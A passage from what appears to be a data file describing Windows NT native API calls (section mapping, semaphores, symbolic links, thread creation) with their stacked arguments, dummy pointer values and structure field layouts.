\"NtExtendSection\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER NewSectionSize (dummy pointer, commonly None for no change)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct214\",\r\n \"structureValueExpectations\": \"New size for the section in bytes, or None to not change.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE SectionHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct214\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x00020000\",\r\n \"fieldComment\": \"New section size: 128 KB\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtMapViewOfSection\": {\r\n \"ntFunc\": \"NtMapViewOfSection\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000040\",\r\n \"additionalComment\": \"ULONG Protect (PAGE_EXECUTE_READWRITE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"ULONG AllocationType (MEM_COMMIT)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"DWORD InheritDisposition (ViewShare)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to ULONG ViewSize (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00002000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER SectionOffset (dummy pointer, commonly None for start of section)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct215\",\r\n \"structureValueExpectations\": \"Offset into section, or None for start.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG CommitSize (0 for default)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG ZeroBits (0 for default)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to PVOID BaseAddress (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00400000\"\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle, typically current process)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000555\",\r\n \"additionalComment\": \"HANDLE SectionHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct215\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Offset 0 (start of section)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtOpenSection\": {\r\n \"ntFunc\": \"NtOpenSection\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct216\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x000F0000\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (SECTION_MAP_READ | SECTION_MAP_WRITE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to HANDLE SectionHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct216\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None (no name, open by handle)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtQuerySection\": {\r\n \"ntFunc\": \"NtQuerySection\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to ULONG ResultLength (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000040\"\r\n },\r\n {\r\n \"value\": \"0x00000040\",\r\n \"additionalComment\": \"ULONG InformationBufferSize (64 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to buffer for section information (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"SECTION_INFORMATION_CLASS (SectionBasicInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000555\",\r\n \"additionalComment\": \"HANDLE SectionHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtUnmapViewOfSection\": {\r\n \"ntFunc\": \"NtUnmapViewOfSection\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00400000\",\r\n \"additionalComment\": \"PVOID BaseAddress (example mapped address)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle, typically current process)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCreateSemaphore\": {\r\n \"ntFunc\": \"NtCreateSemaphore\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"ULONG MaximumCount (example: 16)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG InitialCount (example: 1)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer, often None for unnamed semaphore)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct217\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x001F0003\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (example: SEMAPHORE_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to HANDLE SemaphoreHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct217\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None (unnamed semaphore)\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None (unnamed semaphore)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtOpenSemaphore\": {\r\n \"ntFunc\": \"NtOpenSemaphore\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer, typically points to named semaphore)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct218\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; pointer to UNICODE_STRING object name; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x001F0003\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (example: SEMAPHORE_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to HANDLE SemaphoreHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct218\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0xbadd00a0\",\r\n \"fieldComment\": \"Pointer to UNICODE_STRING (dummy pointer for named semaphore)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtQuerySemaphore\": {\r\n \"ntFunc\": \"NtQuerySemaphore\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to ULONG ReturnLength (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000010\"\r\n },\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"ULONG SemaphoreInformationLength (example: 16 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to buffer for SemaphoreInformation (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"SEMAPHORE_INFORMATION_CLASS SemaphoreBasicInformation\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE SemaphoreHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtReleaseSemaphore\": {\r\n \"ntFunc\": \"NtReleaseSemaphore\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to ULONG PreviousCount (dummy pointer, can be None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000001\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG ReleaseCount (example: 1)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE SemaphoreHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCreateSymbolicLinkObject\": {\r\n \"ntFunc\": \"NtCreateSymbolicLinkObject\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING DestinationName (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct219\",\r\n \"structureValueExpectations\": \"UNICODE_STRING structure describing the symbolic link target name.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct220\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; pointer to UNICODE_STRING object name; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x000F0001\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (example: SYMBOLIC_LINK_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0090\",\r\n \"additionalComment\": \"Pointer to HANDLE pHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct219\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0014\",\r\n \"fieldComment\": \"Length in bytes (example: 20 bytes for 10 WCHARs)\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"Maximum length in bytes (example: 32 bytes)\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd00b0\",\r\n \"fieldComment\": \"Pointer to wide string buffer (dummy pointer)\"\r\n }\r\n ]\r\n },\r\n \"struct220\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0xbadd00c0\",\r\n \"fieldComment\": \"Pointer to UNICODE_STRING (dummy pointer for symbolic link name)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtOpenSymbolicLinkObject\": {\r\n \"ntFunc\": \"NtOpenSymbolicLinkObject\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None (no OBJECT_ATTRIBUTES, open by name not provided)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00020019\",\r\n \"additionalComment\": \"SYMBOLIC_LINK_QUERY | STANDARD_RIGHTS_READ (realistic DesiredAccess)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to HANDLE SymbolicLinkHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQuerySymbolicLinkObject\": {\r\n \"ntFunc\": \"NtQuerySymbolicLinkObject\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to ULONG DataWritten (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000010\"\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING LinkTarget (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct221\",\r\n \"structureValueExpectations\": \"UNICODE_STRING buffer for the symbolic link target.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE SymbolicLinkHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct221\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0010\",\r\n \"fieldComment\": \"Length in bytes of the string\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"Maximum buffer size in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd0090\",\r\n \"fieldComment\": \"Pointer to buffer (dummy pointer)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtAlertResumeThread\": {\r\n \"ntFunc\": \"NtAlertResumeThread\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to ULONG SuspendCount (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000001\"\r\n },\r\n {\r\n \"value\": \"0x00005555\",\r\n \"additionalComment\": \"HANDLE ThreadHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtContinue\": {\r\n \"ntFunc\": \"NtContinue\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"FALSE (do not raise alert)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to CONTEXT structure (dummy pointer)\",\r\n \"structurePointer\": \"CONTEXT\",\r\n \"structureRef\": \"struct222\",\r\n \"structureValueExpectations\": \"Thread context structure with register state.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct222\": {\r\n \"type\": \"CONTEXT\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"ContextFlags\",\r\n \"fieldType\": \"DWORD\",\r\n \"fieldValue\": \"0x00010007\",\r\n \"fieldComment\": \"CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS\"\r\n },\r\n {\r\n \"fieldName\": \"Eip\",\r\n \"fieldType\": \"DWORD\",\r\n \"fieldValue\": \"0x00401000\",\r\n \"fieldComment\": \"Instruction pointer\"\r\n },\r\n {\r\n \"fieldName\": \"Esp\",\r\n \"fieldType\": \"DWORD\",\r\n \"fieldValue\": \"0x0012FFB0\",\r\n \"fieldComment\": \"Stack pointer\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtCreateThread\": {\r\n \"ntFunc\": \"NtCreateThread\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"TRUE (create suspended)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to INITIAL_TEB (dummy pointer)\",\r\n \"structurePointer\": \"INITIAL_TEB\",\r\n \"structureRef\": \"struct223\",\r\n \"structureValueExpectations\": \"Stack base/limit and TEB allocation info.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to CONTEXT (dummy pointer)\",\r\n \"structurePointer\": \"CONTEXT\",\r\n \"structureRef\": \"struct224\",\r\n \"structureValueExpectations\": \"Initial thread context (registers, etc).\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to CLIENT_ID (dummy pointer)\",\r\n \"structurePointer\": \"CLIENT_ID\",\r\n \"structureRef\": \"struct225\",\r\n \"structureValueExpectations\": \"UniqueProcess and UniqueThread identifiers.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00004444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None (no OBJECT_ATTRIBUTES, default)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x001F03FF\",\r\n \"additionalComment\": \"THREAD_ALL_ACCESS (realistic DesiredAccess)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to HANDLE ThreadHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct223\": {\r\n \"type\": \"INITIAL_TEB\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"StackBase\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x0012F000\",\r\n \"fieldComment\": \"Top of stack\"\r\n },\r\n {\r\n \"fieldName\": \"StackLimit\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x0012C000\",\r\n \"fieldComment\": \"Bottom of stack\"\r\n },\r\n {\r\n \"fieldName\": \"StackCommit\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x0012D000\",\r\n \"fieldComment\": \"Committed stack\"\r\n }\r\n ]\r\n },\r\n \"struct224\": {\r\n \"type\": \"CONTEXT\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"ContextFlags\",\r\n \"fieldType\": \"DWORD\",\r\n \"fieldValue\": \"0x00010007\",\r\n \"fieldComment\": \"CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS\"\r\n },\r\n {\r\n \"fieldName\": \"Eip\",\r\n \"fieldType\": \"DWORD\",\r\n \"fieldValue\": \"0x00402000\",\r\n \"fieldComment\": \"Instruction pointer\"\r\n },\r\n {\r\n \"fieldName\": \"Esp\",\r\n \"fieldType\": \"DWORD\",\r\n \"fieldValue\": \"0x0012FFA0\",\r\n \"fieldComment\": \"Stack pointer\"\r\n }\r\n ]\r\n },\r\n \"struct225\": {\r\n \"type\": \"CLIENT_ID\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"UniqueProcess\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x99995555\",\r\n \"fieldComment\": \"Dummy process identifier value\"\r\n },\r\n {\r\n \"fieldName\": \"UniqueThread\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00006666\",\r\n \"fieldComment\": \"Dummy thread identifier value\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtDelayExecution\": {\r\n \"ntFunc\": 